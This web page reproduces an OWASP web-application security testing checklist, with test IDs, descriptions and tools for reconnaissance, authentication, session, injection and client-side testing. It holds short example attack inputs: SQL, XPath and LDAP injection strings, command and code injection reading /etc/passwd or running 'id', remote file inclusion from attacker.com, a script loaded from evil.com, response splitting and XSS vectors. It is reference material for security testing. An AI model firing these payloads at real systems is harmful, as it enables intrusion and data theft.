Skip to content

OWASP Testing Checklist

Information GatheringTest NameDescriptionTools
OTG-INFO-001Conduct Search Engine Discovery and Reconnaissance for Information LeakageUse a search engine to search for Network diagrams and Configurations, Credentials, Error message content.Google Hacking, Sitedigger, Shodan, FOCA, Punkspider
OTG-INFO-002Fingerprint Web ServerFind the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using“HTTP header field ordering” and “Malformed requests test”.Httprint, Httprecon, Desenmascarame
OTG-INFO-003Review Webserver Metafiles for Information LeakageAnalyze robots.txt and identify <META> Tags from website.Browser, curl, wget
OTG-INFO-004Enumerate Applications on WebserverFind applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfersWebhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue
OTG-INFO-005Review Webpage Comments and Metadata for Information LeakageFind sensitive information from webpage comments and Metadata on source code.Browser, curl, wget
OTG-INFO-006Identify application entry pointsIdentify from hidden fields, parameters, methods HTTP header analysisBurp proxy, ZAP, Tamper data
OTG-INFO-007Map execution paths through applicationMap the target application and understand the principal workflows.Burp proxy, ZAP
OTG-INFO-008Fingerprint Web Application FrameworkFind the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.Whatweb, BlindElephant, Wappalyzer
OTG-INFO-009Fingerprint Web ApplicationIdentify the web application and version to determine known vulnerabilities and the appropriate exploits.Whatweb, BlindElephant, Wappalyzer, CMSmap
OTG-INFO-010Map Application ArchitectureIdentify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend DatabaseBrowser, curl, wget
    
Configuration and Deploy Management TestingTest NameDescriptionTools
OTG-CONFIG-001Test Network/Infrastructure ConfigurationUnderstand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.Nessus
OTG-CONFIG-002Test Application Platform ConfigurationIdentify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.Browser, Nikto
OTG-CONFIG-003Test File Extensions Handling for Sensitive InformationFind important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)Browser, Nikto
OTG-CONFIG-004Backup and Unreferenced Files for Sensitive InformationCheck JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filenameNessus, Nikto, Wikto
OTG-CONFIG-005Enumerate Infrastructure and Application Admin InterfacesDirectory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner
OTG-CONFIG-006Test HTTP MethodsIdentify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XSTnetcat, curl
OTG-CONFIG-007Test HTTP Strict Transport SecurityIdentify HSTS header on Web server through HTTP response header.curl -s -D- https://domain.com/ | grep StrictBurp Proxy, ZAP, curl
OTG-CONFIG-008Test RIA cross domain policyAnalyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.Burp Proxy, ZAP, Nikto
    
Identity Management TestingTest NameDescriptionTools
OTG-IDENT-001Test Role DefinitionsValidate the system roles defined within the application by creating permission matrix.Burp Proxy, ZAP
OTG-IDENT-002Test User Registration ProcessVerify that the identity requirements for user registration are alignedwith business and security requirements:Burp Proxy, ZAP
OTG-IDENT-003Test Account Provisioning ProcessDetermine which roles are able to provision users and what sort ofaccounts they can provision.Burp Proxy, ZAP
OTG-IDENT-004Testing for Account Enumeration and Guessable User AccountGeneric login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)Browser, Burp Proxy, ZAP
OTG-IDENT-005Testing for Weak or unenforced username policyUser account names are often highly structured (e.g. Joe Bloggsaccount name is jbloggs and Fred Nurks account name is fnurks)and valid account names can easily be guessed.Browser, Burp Proxy, ZAP
OTG-IDENT-006Test Permissions of Guest/Training AccountsGuest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.Burp Proxy, ZAP
OTG-IDENT-007Test Account Suspension/Resumption ProcessVerify the identity requirements for user registration align with business/security requirements. Validate the registration process.Burp Proxy, ZAP
    
Authentication TestingTest NameDescriptionTools
OTG-AUTHN-001Testing for Credentials Transported over an Encrypted ChannelCheck referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.Burp Proxy, ZAP
OTG-AUTHN-002Testing for default credentialsTesting for default credentials of common applications, Testing for default password of new accounts.Burp Proxy, ZAP, Hydra
OTG-AUTHN-003Testing for Weak lock out mechanismEvaluate the account lockout mechanism’s ability to mitigatebrute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.Browser
OTG-AUTHN-004Testing for bypassing authentication schemaForce browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL InjectionBurp Proxy, ZAP
OTG-AUTHN-005Test remember password functionalityLook for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?Burp Proxy, ZAP
OTG-AUTHN-006Testing for Browser cache weaknessCheck browser history issue by clicking “Back” button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)Burp Proxy, ZAP, Firefox add-on CacheViewer2
OTG-AUTHN-007Testing for Weak password policyDetermine the resistance of the application against brute forcepassword guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements ofpasswords.Burp Proxy, ZAP, Hydra
OTG-AUTHN-008Testing for Weak security question/answerTesting for weak pre-generated questions, Testing for weak self-generated question, Testing for brute-forcible answers (Unlimited attempts?)Browser
OTG-AUTHN-009Testing for weak password change or reset functionalitiesTest password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?Browser, Burp Proxy, ZAP
OTG-AUTHN-010Testing for Weaker authentication in alternative channelUnderstand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)Browser
    
Authorization TestingTest NameDescriptionTools
OTG-AUTHZ-001Testing Directory traversal/file includedot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.Burp Proxy, ZAP, Wfuzz
OTG-AUTHZ-002Testing for bypassing authorization schemaAccess a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)Burp Proxy (Autorize), ZAP
OTG-AUTHZ-003Testing for Privilege EscalationTesting for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1Burp Proxy (Autorize), ZAP
OTG-AUTHZ-004Testing for Insecure Direct Object ReferencesForce changing parameter value (?invoice=123 -> ?invoice=456)Burp Proxy (Autorize), ZAP
    
Session Management TestingTest NameDescriptionTools
OTG-SESS-001Testing for Bypassing Session Management SchemaSessionID analysis prediction, unencrypted cookie transport, brute-force.Burp Proxy, ForceSSL, ZAP, CookieDigger
OTG-SESS-002Testing for Cookies attributesCheck HTTPOnly and Secure flag, expiration, inspect for sensitive data.Burp Proxy, ZAP
OTG-SESS-003Testing for Session FixationThe application doesn’t renew the cookie after a successfully user authentication.Burp Proxy, ZAP
OTG-SESS-004Testing for Exposed Session VariablesEncryption & Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?Burp Proxy, ZAP
OTG-SESS-005Testing for Cross Site Request ForgeryURL analysis, Direct access to functions without any token.Burp Proxy (csrf_token_detect), burpy, ZAP
OTG-SESS-006Testing for logout functionalityCheck reuse session after logout both server-side and SSO.Burp Proxy, ZAP
OTG-SESS-007Test Session TimeoutCheck session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.Burp Proxy, ZAP
OTG-SESS-008Testing for Session puzzlingThe application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.Burp Proxy, ZAP
    
Data Validation TestingTest NameDescriptionTools
OTG-INPVAL-001Testing for Reflected Cross Site ScriptingCheck for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.Burp Proxy, ZAP, Xenotix XSS
OTG-INPVAL-002Testing for Stored Cross Site ScriptingCheck input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEFBurp Proxy, ZAP, BeEF, XSS Proxy
OTG-INPVAL-003Testing for HTTP Verb TamperingCraft custom HTTP requests to test the other methods to bypass URL authentication and authorization.netcat
OTG-INPVAL-004Testing for HTTP Parameter pollutionIdentify any form or action that allows user-supplied input to bypass Input validation and filters using HPPZAP, HPP Finder (Chrome Plugin)
OTG-INPVAL-005Testing for SQL InjectionUnion, Boolean, Error based, Out-of-band, Time delay.Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)
 Oracle TestingIdentify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL InjectionOrascan, SQLInjector
 MySQL TestingIdentify MySQL version, Single quote, Information_schema, Read/Write file.SQLMap, Mysqloit, Power Injector
 SQL Server TestingComment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)SQLMap, SQLninja, Power Injector
 Testing PostgreSQLDetermine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)SQLMap
 MS Access TestingEnumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.SQLMap
 Testing for NoSQL injectionIdentify NoSQL databases, Pass special characters (‘ ” \ ; { } ), Attack with reserved variable name, operator.NoSQLMap
OTG-INPVAL-006Testing for LDAP Injection/ldapsearch?user=*user=*user=*)(uid=*))(|(uid=*pass=passwordBurp Proxy, ZAP
OTG-INPVAL-007Testing for ORM InjectionTesting ORM injection is identical to SQL injection testingHibernate, Nhibernate
OTG-INPVAL-008Testing for XML InjectionCheck with XML Meta Characters‘, ” , <>, <!–/–>, &, <![CDATA[ / ]]>, XXE, TAGBurp Proxy, ZAP, Wfuzz
OTG-INPVAL-009Testing for SSI Injection• Presense of .shtml extension• Check for these characters< ! # = / . ” – > and [a-zA-Z0-9]• include String = <!–#include virtual=”/etc/passwd” –>Burp Proxy, ZAP
OTG-INPVAL-010Testing for XPath InjectionCheck for XML error enumeration by supplying a single quote (‘)Username: ‘ or ‘1’ = ‘1Password: ‘ or ‘1’ = ‘1Burp Proxy, ZAP
OTG-INPVAL-011IMAP/SMTP Injection• Identifying vulnerable parameters with special characters(i.e.: \, ‘, “, @, #, !, |)• Understanding the data flow and deployment structure of the client• IMAP/SMTP command injection (Header, Body, Footer)Burp Proxy, ZAP
OTG-INPVAL-012Testing for Code InjectionEnter OS commands in the input field.?arg=1; system(‘id’)Burp Proxy, ZAP, Liffy, Panoptic
 Testing for Local File InclusionLFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)Burp Proxy, fimap, Liffy
 Testing for Remote File InclusionRFI from malicious URL?page.php?file=http://attacker.com/malicious_pageBurp Proxy, fimap, Liffy
OTG-INPVAL-013Testing for Command InjectionUnderstand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.%3Bcat%20/etc/passwdtest.pdf+|+Dir C:\Burp Proxy, ZAP, Commix
OTG-INPVAL-014Testing for Buffer overflow• Testing for heap overflow vulnerability• Testing for stack overflow vulnerability• Testing for format string vulnerabilityImmunity Canvas, Spike, MSF, Nessus
 Testing for Heap overflow  
 Testing for Stack overflow  
 Testing for Format string  
OTG-INPVAL-015Testing for incubated vulnerabilitiesFile Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)Burp Proxy, BeEF, MSF
OTG-INPVAL-016Testing for HTTP Splitting/Smugglingparam=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>Burp Proxy, ZAP, netcat
    
Error HandlingTest NameDescriptionTools
OTG-ERR-001Analysis of Error CodesLocate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)Burp Proxy, ZAP
OTG-ERR-002Analysis of Stack Traces• Invalid Input / Empty inputs• Input that contains non alphanumeric characters or query syntax• Access to internal pages without authentication• Bypassing application flowBurp Proxy, ZAP
    
CryptographyTest NameDescriptionTools
OTG-CRYPST-001Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer ProtectionIdentify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)testssl.sh, SSL Breacher
OTG-CRYPST-002Testing for Padding OracleCompare the responses in three different states:• Cipher text gets decrypted, resulting data is correct.• Cipher text gets decrypted, resulting data is garbled and causessome exception or error handling in the application logic.• Cipher text decryption fails due to padding errors.PadBuster, Poracle, python-paddingoracle, POET
OTG-CRYPST-003Testing for Sensitive information sent via unencrypted channelsCheck sensitive data during the transmission:• Information used in authentication (e.g. Credentials, PINs, Sessionidentifiers, Tokens, Cookies…)• Information protected by laws, regulations or specific organizationalpolicy (e.g. Credit Cards, Customers data)Burp Proxy, ZAP, Curl
    
Business logic TestingTest NameDescriptionTools
OTG-BUSLOGIC-001Test Business Logic Data Validation• Looking for data entry points or hand off points between systems or software.• Once found try to insert logically invalid data into the application/system.Burp Proxy, ZAP
OTG-BUSLOGIC-002Test Ability to Forge Requests• Looking for guessable, predictable or hidden functionality of fields.• Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow.Burp Proxy, ZAP
OTG-BUSLOGIC-003Test Integrity Checks•Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.• For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.• Attempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the busines logic workflow.Burp Proxy, ZAP
OTG-BUSLOGIC-004Test for Process Timing• Looking for application/system functionality that maybe impacted by time. Such as execution time or actions thathelp users predict a future outcome or allow one to circumventany part of the business logic or workflow. For example, notcompleting transactions in an expected time.• Develop and execute the mis-use cases ensuring that attackerscan not gain an advantage based on any timing.Burp Proxy, ZAP
OTG-BUSLOGIC-005Test Number of Times a Function Can be Used Limits• Looking for functions or features in the application or system that should not be executed more that a single time or specified number of times during the business logic workflow.• For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.Burp Proxy, ZAP
OTG-BUSLOGIC-006Testing for the Circumvention of Work Flows• Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.• For each method develop a misuse case and try to circumvent or perform an action that is “not acceptable” per the the business logic workflow.Burp Proxy, ZAP
OTG-BUSLOGIC-007Test Defenses Against Application Mis-useMeasures that might indicate the application has in-built self-defense:• Changed responses• Blocked requests• Actions that log a user out or lock their accountBurp Proxy, ZAP
OTG-BUSLOGIC-008Test Upload of Unexpected File Types• Review the project documentation and perform some exploratory testing looking for file types that should be “unsupported” by the application/system.• Try to upload these “unsupported” files an verify that it are properly rejected.• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.PS. file.phtml, shell.phPWND, SHELL~1.PHPBurp Proxy, ZAP
OTG-BUSLOGIC-009Test Upload of Malicious Files• Develop or acquire a known “malicious” file.• Try to upload the malicious file to the application/system and verify that it is correctly rejected.• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.Burp Proxy, ZAP
    
Client Side TestingTest NameDescriptionTools
OTG-CLIENT-001Testing for DOM based Cross Site ScriptingTest for the user inputs obtained from client-side JavaScript ObjectsBurp Proxy, DOMinator
OTG-CLIENT-002Testing for JavaScript ExecutionInject JavaScript code:http://www.victim.com/?javascript:alert(1)Burp Proxy, ZAP
OTG-CLIENT-003Testing for HTML InjectionSend malicious HTML code:?user=<img%20src=’aaa’%20onerror=alert(1)>Burp Proxy, ZAP
OTG-CLIENT-004Testing for Client Side URL RedirectModify untrusted URL input to a malicious site: (Open Redirect)?redirect=www.fake-target.siteBurp Proxy, ZAP
OTG-CLIENT-005Testing for CSS InjectionInject code in the CSS context :•  www.victim.com/#red;-o-link:’javascript:alert(1)’;-o-link-source:current; (Opera [8,12])•  www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)Burp Proxy, ZAP
OTG-CLIENT-006Testing for Client Side Resource ManipulationExternal JavaScript could be easily injected in the trusted web sitewww.victim.com/#http://evil.com/js.jsBurp Proxy, ZAP
OTG-CLIENT-007Test Cross Origin Resource SharingCheck the HTTP headers in order to understand how CORS isused (Origin Header)Burp Proxy, ZAP
OTG-CLIENT-008Testing for Cross Site FlashingDecompile, Undefined variables, Unsafe methods, Include malicious SWF (http://victim/file.swf?lang=http://evilFlashBang, Flare, Flasm, SWFScan, SWF Intruder
OTG-CLIENT-009Testing for ClickjackingDiscover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.Burp Proxy, ClickjackingTool
OTG-CLIENT-010Testing WebSocketsIdentify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.Use Google Chrome’s Developer Tools to view the Network WebSocket communication. Check Origin, Confidentiality and Integrity, Authentication, Authorization, Input SanitizationBurp Proxy, Chrome, ZAP, WebSocket Client
OTG-CLIENT-011Test Web MessagingAnalyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domainsBurp Proxy, ZAP
OTG-CLIENT-012Test Local StorageDetermine whether the website is storing sensitive data in the storage. XSS in localstoragehttp://server/StoragePOC.html#<img src=x onerror=alert(1)>Chrome, Firebug, Burp Proxy, ZAP

Show 102550100 entries